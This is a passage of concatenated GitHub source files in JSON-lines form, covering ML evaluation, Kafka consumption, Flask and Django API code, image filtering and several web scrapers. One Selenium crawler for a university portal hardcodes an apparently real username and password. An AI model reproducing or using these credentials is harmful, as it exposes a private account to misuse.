(bench_mean,bench_mean_lb,bench_mean_ub))\n\n if bench_name not in names:\n names.append(bench_name)\n preamble += \" \" + bench_name + \" min max\"\n line_nr += 1\n\n# print(\"names - \" + str(names))\n# print(preamble)\n\nfile = open(folder + \"/results.tmp\", \"w\")\nfile.write(preamble + \"\\n\")\n\nfor bench_type in data.keys():\n # print(\"type - \" + bench_type)\n\n line = bench_type\n for bench_name in data[bench_type].keys():\n (bench_mean, bench_mean_lb, bench_mean_ub) = data[bench_type][bench_name]\n line += \" \" + bench_mean + \" \" + bench_mean_lb + \" \" + bench_mean_ub\n \n # print(\"line - \" + line)\n file.write(line + \"\\n\")\n\nfile.close()\n","repo_name":"rubenpieters/orth-pipes-bench","sub_path":"scripts/transform_micro.py","file_name":"transform_micro.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73362820532","text":"import joblib\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom imblearn.over_sampling import SMOTE\r\nfrom imblearn.pipeline import Pipeline\r\nfrom imblearn.under_sampling import RandomUnderSampler\r\nfrom matplotlib import pyplot as plt\r\nfrom sklearn import metrics\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.feature_selection import SelectKBest, f_classif\r\nfrom sklearn.metrics import roc_curve, auc\r\nfrom sklearn.model_selection import train_test_split, RepeatedStratifiedKFold, RandomizedSearchCV\r\n\r\n\r\ndef plot_confusion_matrix(y_test, model_test):\r\n cm = metrics.confusion_matrix(y_test, model_test)\r\n plt.figure(1)\r\n plt.clf()\r\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Wistia)\r\n classNames = ['Low', 'High']\r\n plt.title('Confusion Matrix')\r\n plt.ylabel('True label')\r\n plt.xlabel('Predicted label')\r\n tick_marks = np.arange(len(classNames))\r\n plt.xticks(tick_marks, classNames)\r\n plt.yticks(tick_marks, classNames)\r\n s = [['TN', 'FP'], ['FN', 'TP']]\r\n for i in range(2):\r\n for j in range(2):\r\n plt.text(j, i, str(s[i][j]) + \" = \" + str(cm[i][j]))\r\n plt.savefig('ConfusionMatrix.png', bbox_inches='tight')\r\n print(\"\\nConfusion Matrix: \", cm)\r\n total = sum(sum(cm))\r\n specificity = cm[0, 0]/(cm[0, 0]+cm[0, 1])\r\n sensitivity = cm[1, 1] / (cm[1, 0] + cm[1, 1])\r\n print(\"\\nSensitivity: \", sensitivity)\r\n print(\"\\nSpecificity: \", specificity)\r\n plt.show()\r\n\r\n\r\ndef report_performance(model):\r\n model_test = model.predict(X)\r\n print(\"\\n\\nClassification Report: \")\r\n print(metrics.classification_report(y, model_test))\r\n plot_confusion_matrix(y, model_test)\r\n\r\n\r\ndef roc_curves(model):\r\n predictions_test = model.predict(X)\r\n fpr, tpr, thresholds = roc_curve(predictions_test, y)\r\n roc_auc = auc(fpr, tpr)\r\n print('AUROC = %.6f' % metrics.auc(fpr, tpr))\r\n plt.figure(2)\r\n plt.plot(fpr, tpr, color='darkorange', lw=1, label='ROC curve (area = %0.2f)' % roc_auc)\r\n plt.plot([0, 1], [0, 1], color='navy', lw=2, linestyle='--')\r\n plt.xlim([0.0, 1.0])\r\n plt.ylim([0.0, 1.05])\r\n plt.xlabel('False Positive Rate')\r\n plt.ylabel('True Positive Rate')\r\n plt.title('Receiver operating characteristic')\r\n plt.legend(loc=\"lower right\")\r\n plt.savefig('ROC.png', bbox_inches='tight')\r\n plt.show()\r\n y_probabilities = model.predict_proba(X)[:, 1]\r\n pr, rc, thresholds = metrics.precision_recall_curve(y, y_probabilities)\r\n plt.plot(pr, rc, color='darkorange')\r\n plt.xlabel('Precision')\r\n plt.ylabel('Recall')\r\n plt.savefig('PRcurve.png', bbox_inches='tight')\r\n plt.show()\r\n\r\n\r\ndef accuracy(model):\r\n pred = model.predict(X)\r\n accu = metrics.accuracy_score(y, pred)\r\n print(\"\\nAcurracy Of the Model: \", accu, \"\\n\\n\")\r\n\r\n\r\ndata_path = \"./Data/test_preprocessed_trail_data_categorized.csv\"\r\ndata_set = pd.read_csv(data_path)\r\nfeatures = list(data_set.columns)\r\npredicted_class = ['dementia_risk']\r\nfeature_classes = list(set(features) - set(predicted_class))\r\n\r\nX = data_set[feature_classes].values\r\ny = data_set[predicted_class].values\r\n# y = preprocessing.label_binarize(y, classes=[0, 1, 2, 3, 4])\r\nprint(X.shape, y.shape)\r\n\r\n\r\ndef count_freq(x):\r\n (unique, counts) = np.unique(np.array(x), return_counts=True)\r\n frequencies = np.asarray((unique, counts)).T\r\n return frequencies\r\n\r\n\r\nloaded_model = joblib.load(\"random_forest_model.pkl\")\r\ny_pred = loaded_model.predict(X)\r\n\r\n\r\nreport_performance(loaded_model)\r\naccuracy(loaded_model)\r\nroc_curves(loaded_model)\r\n\r\n","repo_name":"MaheshkumarSundaram/Dissertation","sub_path":"Testing/test_random_forest_implementation.py","file_name":"test_random_forest_implementation.py","file_ext":"py","file_size_in_byte":3552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22144766436","text":"\"\"\"The API status information consumer.\n\"\"\"\n\nimport logging\n\n\nclass APIStatusKafkaConsumer():\n \"\"\"APIStatusKafkaConsumer is tied to consume single topic given\n as :status_topic.\n\n All parameters are required to be valid objects.\n \"\"\"\n\n def __init__(self, status_topic, kafka_consumer, database_writer):\n assert status_topic is not None\n assert kafka_consumer is not None\n assert database_writer is not None\n self.consumer = kafka_consumer\n self.status_topic = status_topic\n self.consumer.subscribe(self.status_topic)\n self.database_writer = database_writer\n\n def close(self):\n \"\"\"Closes the Kafka consumer and the database writer.\n \"\"\"\n logging.info(\"Closing consumer.\")\n try:\n self.consumer.close()\n self.database_writer.close()\n except Exception:\n logging.warning(\"Consumer close raised an exception.\", exc_info=1)\n logging.info(\"Consumer closed.\")\n\n def consume(self):\n \"\"\"Poll messages instead of using the consumer iterator.\n Using poll gives better control to shutdown after reading\n a batch of messages.\n \"\"\"\n\n topics = self.consumer.poll(timeout_ms=100)\n for topic, messages in topics.items():\n for message in messages:\n logging.debug(\"Topic: %s and value %s\", topic, message.value)\n try:\n self.database_writer.persist(message.value)\n except Exception:\n logging.warning(\"Database writing failed.\", exc_info=1)\n self. consumer.commit()\n","repo_name":"jjaakola/bang-a-gong","sub_path":"src/api_status_monitor/consumer/kafkaconsumer.py","file_name":"kafkaconsumer.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8371067970","text":"#!C:\\Users\\user\\AppData\\Local\\Programs\\Python\\Python310\\python.exe\r\nprint(\"content-type: text/html; charset=euc-kr\\n\")\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime\r\nimport cgi, os\r\n\r\nform=cgi.FieldStorage()\r\ndf_mt = pd.read_excel('data/maintask.xlsx')\r\ndf_dt = pd.read_excel('data/date_std.xlsx')\r\ndf_mt.fillna('', inplace=True)\r\n\r\n#date DB에서 merge 필요한 column만 추출\r\ndf_dt2 = df_dt[['DATE', 'WN_SERIAL NO', 'STD_CODE']]\r\n#MMM-DD포멧으로 Column 생성하여 붙여넣기\r\ndf_dt2['unique_date'] = np.nan\r\n\r\n#mmm-dd형식의 날짜 데이터 생성\r\ni=0\r\nwhile i < len(df_dt2):\r\n x = df_dt2.iloc[i,0].strftime('%b %d, %Y') #std 코드에 해당하는 날짜를 가져옴\r\n df_dt2.loc[i,['unique_date']] = x\r\n i+=1\r\n\r\n#Main Task DB에 날짜 데이터 붙이기\r\ndf = pd.merge(df_mt, df_dt2, how='left', left_on='DUE DATE', right_on='DATE')\r\n\r\nurl_id = 'http://127.0.0.1:81/PJT_workstation/index.py?id='\r\ndef make_clickable(url, code):\r\n return '<a href=\"{}\" rel=\"noopener noreferrer\" target=\"_blank\">{}</a>'.format(url, code)\r\n #return f'{url}\" rel=\"noopener noreferrer\" target=\"_blank\">{name}'\r\n\r\ndf['link'] = df.apply(lambda x: make_clickable(url_id+x['TASK_CODE'], x['TASK_CODE']), axis=1)\r\n\r\n\r\n\r\n#wn 지정하고 날짜 리스트 생성\r\ndef get_cols(wn):\r\n cols = []\r\n wn = str(wn)\r\n for i in range(1,8):\r\n a = wn+'_'+str(i)\r\n x = df_dt.loc[df_dt['STD_CODE']==a,['DATE']]\r\n x2 = x.iloc[0,0].strftime('%b %d, %Y')\r\n cols.append(x2)\r\n return cols\r\n\r\n#redirection\r\nprint('Location: index.py')\r\nprint()","repo_name":"howonsun/Python","sub_path":"PJT_workstation/set_up.py","file_name":"set_up.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38890304088","text":"from flask_restplus import reqparse\nfrom werkzeug.datastructures import FileStorage\n\nget_containers = reqparse.RequestParser()\nget_containers.add_argument('start',type=int,required=True,help='For pagination. Current index to start from')\n\ndetect_object = reqparse.RequestParser()\ndetect_object.add_argument('image',type=FileStorage,location='files',required=False,help='file')\ndetect_object.add_argument('container_id',type=str,required=True,help='Container ID')\n\ncheck_for_one = reqparse.RequestParser()\ncheck_for_one.add_argument('container_id',type=str,required=True,help='Container ID')\n\n\nadd_container_two = reqparse.RequestParser()\nadd_container_two.add_argument('is_countable',type=bool,required=True,help='Is the item countable')\nadd_container_two.add_argument('name_item',type=str,required=True,help='Name of item')\nadd_container_two.add_argument('container_id',type=str,required=True,help='Container ID')\n\n\nnew_meal_save = reqparse.RequestParser()\nnew_meal_save.add_argument('image', type=FileStorage, location='files', required=False, help='file')\nnew_meal_save.add_argument('ingredient', type=str, required=True, help='Ingredient')\nnew_meal_save.add_argument('name',type=str,required=True,help='Meal name')\nnew_meal_save.add_argument('cook_time',type=str,required=True,help='Cook time')\n\nget_all_ingredient = reqparse.RequestParser()\nget_all_ingredient.add_argument('meal_id',type=int,required=False,help='Meal ID')\n\nsuggest_meal_list = reqparse.RequestParser()\nsuggest_meal_list.add_argument('people_count',type=int,required=False,help='How many people will eat this meal?')","repo_name":"trustedcoder/smart_container_api","sub_path":"app/main/util/req_parser.py","file_name":"req_parser.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15942594661","text":"#!/usr/bin/python\n\"\"\"Multiline sed is tricky! It's easier to look at character sequences.\n\n\"\"\"\n\nimport sys\nimport re\n\ndef main():\n \"\"\"Parse the files to remove newline and tab characters.\"\"\"\n \n sourcefiles = sys.argv[1]\n localDirectory = sys.argv[2] + \"/\"\n \n # construct a list of files to parse\n file = open(sourcefiles, \"r\")\n lines = file.readlines()\n webpages = []\n for i, line in enumerate(lines):\n line = line.strip()\n webpages.append(localDirectory + line)\n file.close()\n \n for filename in webpages:\n #print \"Parsing file \" + filename\n file = open(filename, \"r\")\n text = file.read()\n file.close()\n # whitespace in the HTML, value is indented\n text = re.sub(r'\\<td class=\\\"cnncol4\\\"\\>\\s+', '<td class=\\\"cnncol4\\\">', text)\n text = text.replace(\"<td class=\\\"cnncol4\\\">\\n\\t\\t\\t\\t\\t\\t\", \"<td class=\\\"cnncol4\\\">\")\n # closing tag is indented\n text = text.replace(\"\\n\\t\\t\\t\\t\\t\\t\\n\\t\\t\\t\\t\\t\\t</td>\", \"</td>\")\n file = open(filename, \"w\")\n file.write(text)\n file.close()\n \n \nif __name__ == \"__main__\":\n main()\n","repo_name":"mockturtl/fortune500","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2239885470","text":"import ast\nimport os\nimport sys\nfrom typing import Any, List\n\nfrom .source_parsers import direct_invocation, flask_router, webapp2_router\n\n\ndef _get_method_children(expr: Any) -> List[Any]:\n \"\"\"Recursively get potential \"child\" snippets of a snippet method\n\n This method recursively retrieves a list of expressions within\n a method that may represent calls to other snippets. This is\n necessary because tests that cover the parent snippet should\n also be considered to (recursively) cover any snippets called\n by the parent snippet itself.\n\n Args:\n expr (ast.AST): a Python expression object\n\n Returns:\n List[ast.AST]: a list of potential child snippet methods\n\n \"\"\"\n results = []\n\n if hasattr(expr, 'id'):\n results.append(expr.id) # Base case\n\n if hasattr(expr, 'body') and isinstance(expr.body, list):\n for sub_expr in expr.body:\n results += _get_method_children(sub_expr)\n\n if hasattr(expr, 'orelse') and isinstance(expr.orelse, list):\n for sub_expr in expr.orelse:\n results += _get_method_children(sub_expr)\n\n if hasattr(expr, 'value'):\n results += _get_method_children(expr.value)\n\n if hasattr(expr, 'func'):\n func_list = expr.func\n if not isinstance(func_list, list):\n # Not all func values are lists!\n func_list = [func_list]\n\n for func in func_list:\n results += _get_method_children(func)\n if hasattr(func, 'args'):\n for arg in func.args:\n results += _get_method_children(arg)\n\n return results\n\n\ndef _get_ending_line(expr: Any) -> int:\n \"\"\"Get the ending line number of a Python expression\n\n This method gets the final line number of a\n (possibly-multiline) Python expression.\n\n Args:\n expr (ast.AST): a Python expression object\n\n Returns:\n int: the line number on which the given expression ends\n \"\"\"\n final_stmt = expr\n highest_line_no = -1\n not_at_end = True\n while not_at_end:\n if hasattr(final_stmt, 'lineno'):\n highest_line_no = final_stmt.lineno\n\n body_is_valid = hasattr(final_stmt, 'body') and final_stmt.body\n if hasattr(final_stmt, 'orelse') and final_stmt.orelse:\n # 'orelse' should take priority over 'body'\n # (as it always has a lower ending line)\n final_stmt = final_stmt.orelse\n if isinstance(final_stmt, list):\n # .orelse may or may not be a list\n final_stmt = final_stmt[-1]\n elif body_is_valid and isinstance(final_stmt.body, list):\n final_stmt = final_stmt.body[-1]\n elif body_is_valid:\n final_stmt = final_stmt.body\n elif hasattr(final_stmt, 'exc'):\n final_stmt = final_stmt.exc\n elif hasattr(final_stmt, 'args') and final_stmt.args:\n final_stmt = final_stmt.args[-1]\n elif hasattr(final_stmt, 'elts') and final_stmt.elts:\n final_stmt = final_stmt.elts[-1]\n elif hasattr(final_stmt, 'generators') and final_stmt.generators:\n final_stmt = final_stmt.generators[-1]\n elif hasattr(final_stmt, 'iter'):\n final_stmt = final_stmt.iter\n elif hasattr(final_stmt, 'values') and final_stmt.values:\n final_stmt = final_stmt.values[-1]\n elif hasattr(final_stmt, 'value'):\n # some (but not all) value attributes have\n # child elements - we handle both kinds here\n final_stmt = final_stmt.value\n else:\n not_at_end = False\n\n return highest_line_no\n\n\ndef get_top_level_methods(source_path: str) -> List[Any]:\n \"\"\"Gets the top-level methods within a file\n\n Args:\n source_path: path to the file to process\n\n Returns:\n List[ast.AST]: a list of the top-level\n methods within the provided file\n \"\"\"\n try:\n with open(source_path, 'r') as f:\n content = ''.join(f.readlines())\n nodes = list(ast.iter_child_nodes(ast.parse(content)))\n\n # Webapp2 is the only parser that detects class names explicitly\n # Other parsers use the module name (filename minus \".py\" suffix)\n module_name = os.path.splitext(\n os.path.basename(source_path))[0]\n\n methods = []\n\n methods += webapp2_router.parse(nodes)\n methods += flask_router.parse(nodes, module_name)\n\n # run direct_invocation parser after flask_router to avoid dupes\n methods += direct_invocation.parse(nodes, module_name)\n\n for method in methods:\n method.drift.source_path = os.path.abspath(source_path)\n method.drift.children = _get_method_children(method)\n method.drift.end_line = _get_ending_line(method)\n\n return methods\n except IOError as err:\n # Fail gracefully if a file can't be read\n # (This shouldn't happen, but if it doess\n # we don't want to \"break the build\".)\n sys.stderr.write(\n f'WARNING: could not read file: {source_path}\\n')\n sys.stderr.write(\n f'\\t{str(err)}\\n')\n\n return []\n except SyntaxError as err:\n # Fail gracefully if a file doesn't use py3-compliant syntax.\n sys.stderr.write(\n f'WARNING: could not parse file: {source_path}\\n')\n sys.stderr.write(\n f'\\t{str(err)}\\n')\n\n return []\n","repo_name":"GoogleCloudPlatform/repo-automation-playground","sub_path":"xunit-autolabeler-v2/ast_parser/python/source_parser.py","file_name":"source_parser.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"11643670773","text":"from django.urls import reverse,resolve\nfrom rest_framework.test import APITestCase\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import status\nfrom django.contrib.auth.models import User\nfrom applications.vehicles.routers import router\nfrom .test_type_vehicle import TypeVehicleAPIViewTests \nfrom .test_brand_api import BrandAPIViewTests\nfrom applications.vehicles.models import *\nclass VehicleAPIViewTests(APITestCase):\n\n type_vehicle_url = reverse('type_vehicle-list')\n brand_url = reverse('brand-list')\n vehicle_url = reverse('vehicle-list')\n vehicle_urls_detail = reverse('vehicle-detail', args=[1])\n\n\n\n type_vehicle = TypeVehicleAPIViewTests.data_type_vehicle\n brand = BrandAPIViewTests.data_brand\n\n\n\n def setUp(self):\n self.user = User.objects.create_user(username='admin',password='admin@gmail.com')\n self.token = Token.objects.create(user = self.user)\n self.client.credentials(HTTP_AUTHORIZATION='Token '+self.token.key)\n self.response_type_vehicle = self.client.post(self.type_vehicle_url,data=self.type_vehicle, format='json')\n self.response_brand = self.client.post(self.brand_url,data=self.brand, format='json')\n brand_object = Brand.objects.get(id=self.response_brand.data['id']).id\n type_vehicle_object = TypeVehicle.objects.get(id=self.response_type_vehicle.data['id']).id\n\n self.vehicle_data = {\n 'modelo' : 2018,\n 'brand' : self.response_brand.data['id'],\n 'type_vehicle' : self.response_type_vehicle.data['id'],\n 'plate' : 'ddrx2'\n }\n response_vehicle = self.client.post(self.vehicle_url,self.vehicle_data,format='json')\n\n def tearDown(self):\n pass\n\n def test_get_vehicle_authenticated(self):\n response = self.client.get(self.vehicle_url)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n def test_post_vehicle_authenticated(self):\n response = self.client.post(self.vehicle_url,self.vehicle_data,format='json')\n #import pdb; pdb.set_trace()\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n self.assertEqual(response.data['modelo'], 2018)\n return response\n\n #self.assertEqual(response.data['type_vehicle'],'automovil')\n\n def test_detail_vehicle_authenticated(self):\n response = self.client.get(self.vehicle_urls_detail)\n #import pdb; pdb.set_trace()\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.data['modelo'],2018)\n\n ### NOT AUTHENTICATE\n\n def test_get_vehicle_un_authenticated(self):\n self.client.force_authenticate(user=None,token=None)\n response = self.client.get(self.vehicle_url)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n def test_post_vehicle_un_authenticated(self):\n self.client.force_authenticate(user=None,token=None)\n response = self.client.post(self.vehicle_url,data=self.vehicle_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\n def test_detail_vehicle_un_authenticated(self):\n self.client.force_authenticate(user=None,token=None)\n response = self.client.get(self.vehicle_urls_detail)\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\n","repo_name":"EdwardPinzon13/test-orders","sub_path":"applications/vehicles/tests/test_vehicle_api.py","file_name":"test_vehicle_api.py","file_ext":"py","file_size_in_byte":3358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40956103037","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nimg = np.loadtxt('edge_detect.txt', delimiter = ',')\nsave = False if input(\"Save figure? \").lower() == 'no' else True\nverbose = False if input(\"Plot figure? \").lower() == 'no' else True\n\n\nfig, ax = plt.subplots(figsize=(15,15))\nax.imshow(img, cmap='gray')\nif save == True:\n plt.savefig('result.png', format = 'png')\nif verbose == True:\n plt.show()\n","repo_name":"burklight/GPU-Accelerated-Edge-Detection","sub_path":"app/saveImage.py","file_name":"saveImage.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13186982865","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nfrom time import sleep\n\n# 모든 팝업창 닫기\ndef close_all_popup(driver) :\n popups = driver.find_elements_by_tag_name('iframe')[:-2]\n for popup in popups :\n popup_src = popup.get_attribute(\"src\")\n # '=' 이후가 popup id이다.\n popup_id = popup_src[popup_src.find('=') + 1:]\n driver.switch_to_frame(popup)\n driver.execute_script('fn_close(\"{}\");'.format(popup_id))\n\n\n \n\ndriver = webdriver.Chrome('/Users/justi/chromedriver_win32/chromedriver')\n\ndriver.implicitly_wait(3)\n\ndriver.get('https://klas.khu.ac.kr/index.jsp?sso=ok')\n\n\nmain = driver.find_element_by_name('main')\ndriver.switch_to_frame(main)\n\nclose_all_popup(driver)\n\n# main 화면으로 돌아가기\ndriver.switch_to_default_content()\ndriver.switch_to_frame(main)\n\n# 로그인 하기\ndriver.find_element_by_name('USER_ID').send_keys(\"justdo\")\ndriver.find_element_by_name('PASSWORD').send_keys(\"2016104163a\")\ndriver.execute_script('login()')\n\nmain = driver.find_element_by_name('main')\n\ndriver.switch_to_frame(main)\n\nhtml = driver.page_source\n\nbs = BeautifulSoup(html, 'lxml')\n\nalarm = bs.find('div', class_='log_ex_sec_cont')\n\nif alarm.find('dl').get_text() == '' :\n print(\"알림이 없습니다.\")\nelse :\n for warning in alarm.find_all('dl') :\n warning.find('dt').get_text() # 강좌 이름\n warning.find('dd').get_text()[:-12] # 과제 이름\n warning.find('dd').get_text()[-12:] # 마감 기한\n\n\n","repo_name":"euidong/khu_alarm","sub_path":"crawler/klas_crawler.py","file_name":"klas_crawler.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14685302191","text":"import numpy as np\r\nimport cv2\r\n\r\nhighThresh\t= 0.4\r\nlowThresh\t\t= 0.1\r\nimgFileList\t= ('./ip.jpeg', './mypic.jpg')\r\n\r\ndef sobel (img):\r\n\t\r\n\topImgx\t\t= cv2.Sobel(img,cv2.CV_8U,0,1,ksize=3)\r\n\topImgy\t\t= cv2.Sobel(img,cv2.CV_8U,1,0,ksize=3)\t\r\n\t\r\n\treturn cv2.bitwise_or(opImgx,opImgy)\t\r\n\r\ndef sketch(frame):\t\r\n\t\r\n\tframe\t\t= cv2.GaussianBlur(frame,(3,3),0)\r\n\tinvImg\t= 255-frame\r\n\tedgImg0\t\t= sobel(frame)\r\n\tedgImg1\t\t= sobel(invImg)\r\n\tedgImg\t\t= cv2.addWeighted(edgImg0,1,edgImg1,1,0)\t\r\n\topImg\t\t= 255-edgImg\r\n\treturn opImg\r\n\t\r\nif __name__ == '__main__':\r\n\tfor imgfile in imgFileList:\r\n\t\tprint (imgfile)\r\n\t\timg\t\t= cv2.imread (imgfile,0)\r\n\t\topImg\t= sketch(img)\t\r\n\t\tcv2.imshow (imgfile,opImg)\r\n\t\r\n\tcv2.waitKey()\r\n\tcv2.destroyAllWindows()","repo_name":"Yamini-G/projects","sub_path":"Cartoonifier/python codes/sketch.py","file_name":"sketch.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5447995526","text":"def checking(number):\n try:\n number = int(number)\n if number <=0 or number >=120:\n print('You typed wrond age ') # or raise ValueError('You typed wrond number ')\n return False\n else:\n return True\n except ValueError:\n print('You entered not a age')\n return False\n\ndef is_odd(age):\n if age %2 == 1:\n return True\n return False\nwhile True:\n input_ = input(\"Enter your age: \")\n if checking(input_):\n print(f'Your age is odd: {is_odd(int(input_))}')\n break\n\n\n","repo_name":"kolyasalubov/UA-12-10-23.PythonFundamentals","sub_path":"MorozovVladyslav/HW11/first_task.py","file_name":"first_task.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"36517716018","text":"import logging\nimport os\nfrom enum import Enum\nfrom typing import Dict, Collection, Optional\n\nfrom aiohttp import ClientSession\n\n\nlogger = logging.getLogger(__name__)\n\n\nBATCH_MAX_URLS = 50\nAPI_URL = 'https://acceleratedmobilepageurl.googleapis.com/v1/ampUrls:batchGet'\n\n\nclass LookupStrategy(Enum):\n \"\"\"\n AMP lookup strategies:\n\n FETCH_LIVE_DOC:\n strategy involves live document fetch of URLs not found in the index.\n Any request URL not found in the index is crawled in realtime to validate if there\n is a corresponding AMP URL. This strategy has higher coverage but with extra latency\n introduced by realtime crawling. This is the default strategy. Applications using this\n strategy should set higher HTTP timeouts of the API calls.\n\n IN_INDEX_DOC:\n strategy skips fetching live documents of URL(s) not found in index. For\n applications which need low latency use of IN_INDEX_DOC strategy is recommended.\n\n \"\"\"\n FETCH_LIVE_DOC = 'FETCH_LIVE_DOC'\n IN_INDEX_DOC = 'IN_INDEX_DOC'\n\n\nasync def create_amp_lookup(urls: Collection[str],\n lookup_strategy: LookupStrategy = LookupStrategy.FETCH_LIVE_DOC,\n http_client: Optional[ClientSession] = None) -> Dict:\n \"\"\"\n Creates an AMP lookup dict based on provided articles.\n Do a google API call and tries to match existing articles urls\n to AMP versions. Returns a dict where key is an original url\n and value is an AMP url\n \"\"\"\n logger.info('Creating AMP lookup')\n if not urls:\n return {}\n\n urls = list(urls) # convert to list so we'll be able to do a slicing\n http_client = http_client or ClientSession()\n lookup = {}\n\n # since max number of URLs we can pass is 50 - we divide the urls\n # list into a few different lists to be able to process all of them\n for x in range(len(urls) - 1 // BATCH_MAX_URLS + 1):\n start_idx = x * BATCH_MAX_URLS\n end_idx = x * BATCH_MAX_URLS + BATCH_MAX_URLS\n scope = urls[start_idx:end_idx]\n\n if not scope:\n continue\n\n async with http_client.post(\n API_URL,\n json={'urls': scope, 'lookupStrategy': lookup_strategy.value},\n params={'key': os.environ['GOOGLE_API_KEY']}\n ) as response:\n\n response.raise_for_status()\n json_response = await response.json()\n amp_urls = json_response.get('ampUrls')\n if not amp_urls:\n continue # it's possible that no AMP URL's returned\n lookup.update({x['originalUrl']: x['ampUrl'] for x in amp_urls})\n\n logger.info(f'AMP lookup created. Found {len(lookup)} out of {len(urls)} URLs')\n return lookup\n","repo_name":"Aristekrat/unified_api","sub_path":"unifiedpost/parsers/amp/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11601696101","text":"# -*- coding: utf-8 -*-\n# @Time : 2020/2/23 9:53\n# @Author : lightsmile\n# @Software: PyCharm\n\nfrom lightspider import Spider, light\nfrom lxml import etree\n\n\n@light\ndef parser(response):\n html = etree.HTML(response.text)\n title = html.xpath('string(.//div[@class=\"list-group-item active-cat\"])').strip()\n items = html.xpath('.//div[@id=\"ipt-kb-affix-active-post\"]/a')\n items = [(item.xpath('string(.)').strip(), item.xpath('string(./@href)'))for item in items]\n return {\n 'category': title,\n 'peoples': items\n }, None\n\n\nbase_url = 'http://www.w3guo.com/wiki/hero/{}'\ntasks = ['other', 'wu', 'wei', 'shu', 'jin']\n\nsave_format = 'json'\nsave_path = r'D:\\Data\\KG\\three_kingdoms_people'\n\nspider = Spider(base_url=base_url, save_format=save_format, save_path=save_path, interval=2)\n\nif __name__ == '__main__':\n spider.run(tasks, parser)\n","repo_name":"smilelight/lightSpider","sub_path":"examples/w3guo_people.py","file_name":"w3guo_people.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"21"} +{"seq_id":"9911450658","text":"import scrapy\nfrom datetime import datetime\n\nfrom theoccasionoctopusbotsimport.base_spider import BaseSpider\n\n\nclass CoopsUK(BaseSpider):\n name = 'coopsuk'\n download_delay = 30\n start_urls = ['https://www.uk.coop/all-events']\n\n def start_requests(self):\n yield scrapy.Request(\n url='https://www.uk.coop/all-events',\n callback=self.parse_list\n )\n\n def parse_list(self, response):\n for link in response.xpath(\"//article[contains(@class, 'node')]\"):\n url = 'https://www.uk.coop' + link.xpath('a').xpath('@href').extract()[0]\n yield scrapy.Request(\n url=url,\n callback=self.parse\n )\n next_page = response.xpath(\"//li[contains(@class, 'pager-next')]\").xpath('a').xpath('@href').extract()\n if next_page:\n yield scrapy.Request(\n url='https://www.uk.coop' + next_page[0],\n callback=self.parse_list\n )\n\n def parse(self, response):\n\n if response.css(\"div.event-meta\").css(\"span.date-display-start\"):\n\n start_string = response.css(\"div.event-meta\").css(\"span.date-display-start\").xpath('@content').extract()[0]\n start = datetime.strptime(start_string, '%Y-%m-%dT%H:%M:%S%z')\n\n end_string = response.css(\"div.event-meta\").css(\"span.date-display-end\").xpath('@content').extract()[0]\n end = datetime.strptime(end_string, '%Y-%m-%dT%H:%M:%S%z')\n\n else:\n\n start_string = response.css(\"div.event-meta\").css(\"span.date-display-single\").xpath('@content').extract()[0]\n start = datetime.strptime(start_string, '%Y-%m-%dT%H:%M:%S%z')\n end = datetime.strptime(start_string, '%Y-%m-%dT%H:%M:%S%z')\n\n out = {\n 'event': {\n 'find_by_url': response.request.url,\n 'data': {\n 'title': response.xpath(\"//h1\").xpath('string(.)').extract()[0].strip(),\n 'url': response.request.url,\n 'description': response.xpath(\"//div[contains(@class, 'body')]\").xpath('string(.)').extract()[0].strip(),\n 'start_year_timezone': start.year,\n 'start_month_timezone': start.month,\n 'start_day_timezone': start.day,\n 'start_hour_timezone': start.hour,\n 'start_minute_timezone': start.minute,\n 'end_year_timezone': end.year,\n 'end_month_timezone': end.month,\n 'end_day_timezone': end.day,\n 'end_hour_timezone': end.hour,\n 'end_minute_timezone': end.minute,\n 'deleted': False,\n 'cancelled': False,\n },\n 'add_tags': []\n }\n }\n for tag_id, tag in self.tags.items():\n if tag['title'] in out['event']['data']['title']:\n 